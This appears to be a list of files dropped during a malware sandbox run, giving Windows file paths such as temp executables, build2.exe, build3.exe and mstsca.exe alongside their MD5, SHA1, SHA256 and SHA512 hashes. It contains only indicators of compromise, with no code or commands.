SHA512 aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

C:\Users\Admin\AppData\Local\Temp\67E6.exe

MD5 d1c4c493c171000d21ae122bc5d819ba
SHA1 e469267b65d3aacb2fe5074fd2a54485fab00ef0
SHA256 76ae20cea89aac265c5403e1cd0e7baab8f205eaed7a48f199f86b4009d57df5
SHA512 c754970b9f506e8067eab9ec89ae56328a46333e87d97b13b88de1097cc6bdfd3aee60c7efa65643a2d5d77b70b397d5222395e3268eda70d9ae5cfb12be012e

C:\Users\Admin\AppData\Local\151c072c-a790-4b59-a92a-35c783e9855c\build3.exe

MD5 9ead10c08e72ae41921191f8db39bc16
SHA1 abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA256 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512 aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

C:\Users\Admin\AppData\Local\Temp\67E6.exe

MD5 d1c4c493c171000d21ae122bc5d819ba
SHA1 e469267b65d3aacb2fe5074fd2a54485fab00ef0
SHA256 76ae20cea89aac265c5403e1cd0e7baab8f205eaed7a48f199f86b4009d57df5
SHA512 c754970b9f506e8067eab9ec89ae56328a46333e87d97b13b88de1097cc6bdfd3aee60c7efa65643a2d5d77b70b397d5222395e3268eda70d9ae5cfb12be012e

C:\Users\Admin\AppData\Local\Temp\3942.exe

MD5 d7ee13f748b73d180c5bd3e9385ceb00
SHA1 6c31e9f5eda2696ed5eb21af81467c8507591edb
SHA256 86e73fa70c51113dda5d32d8b7b18271ad51806fcd254a2189c57a496e9c86ba
SHA512 3f0a03720f66f328ec5c1e8c1b130f01688e63c3c9298182f671e7dec110a50d91f8a749a2f9c1b168186e6c5345d53e3491634c0324b0922c4cf417f52823fe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

MD5 9ead10c08e72ae41921191f8db39bc16
SHA1 abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA256 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512 aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

\Users\Admin\AppData\Local\Temp\9802.dll

MD5 7292b17c8fa8000b5d7c36279669f96e
SHA1 ca0d9ce9d737bde5a2e1a1639cd9e3762f7c9a1b
SHA256 b2f3ad76def35672309bb9ef2f951b58d37d5010327cbe70b89d756c01d22fc2
SHA512 37d0f05b96b2c837b5cdbe98b160a2168c2d2da2c470f60ab749c4a3fed236c08e47e8ced9a5e799a980ccfa9e362b3d343e28fd36db26ee99dcb8e8f7bbd5e1

\Users\Admin\AppData\Local\Temp\9802.dll

MD5 7292b17c8fa8000b5d7c36279669f96e
SHA1 ca0d9ce9d737bde5a2e1a1639cd9e3762f7c9a1b
SHA256 b2f3ad76def35672309bb9ef2f951b58d37d5010327cbe70b89d756c01d22fc2
SHA512 37d0f05b96b2c837b5cdbe98b160a2168c2d2da2c470f60ab749c4a3fed236c08e47e8ced9a5e799a980ccfa9e362b3d343e28fd36db26ee99dcb8e8f7bbd5e1

C:\Users\Admin\AppData\Local\Temp\89E6.exe

MD5 329d7c6568113a9cc2904037638bb518
SHA1 1044bb723ad24a89bab8875879db06ac4435362d
SHA256 27a2a14ddca16851acaddb42a20201ed175878c868e1ecc7499a3fd4cf4eaa55
SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

C:\Users\Admin\AppData\Local\Temp\89E6.exe

MD5 329d7c6568113a9cc2904037638bb518
SHA1 1044bb723ad24a89bab8875879db06ac4435362d
SHA256 27a2a14ddca16851acaddb42a20201ed175878c868e1ecc7499a3fd4cf4eaa55
SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

C:\Users\Admin\AppData\Local\Temp\9561.exe

MD5 d7ee13f748b73d180c5bd3e9385ceb00
SHA1 6c31e9f5eda2696ed5eb21af81467c8507591edb
SHA256 86e73fa70c51113dda5d32d8b7b18271ad51806fcd254a2189c57a496e9c86ba
SHA512 3f0a03720f66f328ec5c1e8c1b130f01688e63c3c9298182f671e7dec110a50d91f8a749a2f9c1b168186e6c5345d53e3491634c0324b0922c4cf417f52823fe

C:\Users\Admin\AppData\Local\Temp\3BD4.exe

MD5 329d7c6568113a9cc2904037638bb518
SHA1 1044bb723ad24a89bab8875879db06ac4435362d
SHA256 27a2a14ddca16851acaddb42a20201ed175878c868e1ecc7499a3fd4cf4eaa55
SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

C:\Users\Admin\AppData\Local\0b308a45-a6ef-46f9-9fa5-5e523635e756\build2.exe

MD5 5c08a40f82908735b187705b49de1fc3
SHA1 6e108f3f6611f46941869d7fcbe02c47219c0523
SHA256 7539d1cff13c822fbffc73cb9416dd8ae40d79f59b03b1e77b0909e182b6bd2b
SHA512 76d06c1686e1ec9bec07188769e3a851b98f042e962eee74bd195e156d15fd9ebc4997b10af092561178ef3918e86dd620d7070934db7b1f5a5449c19cfbe1fd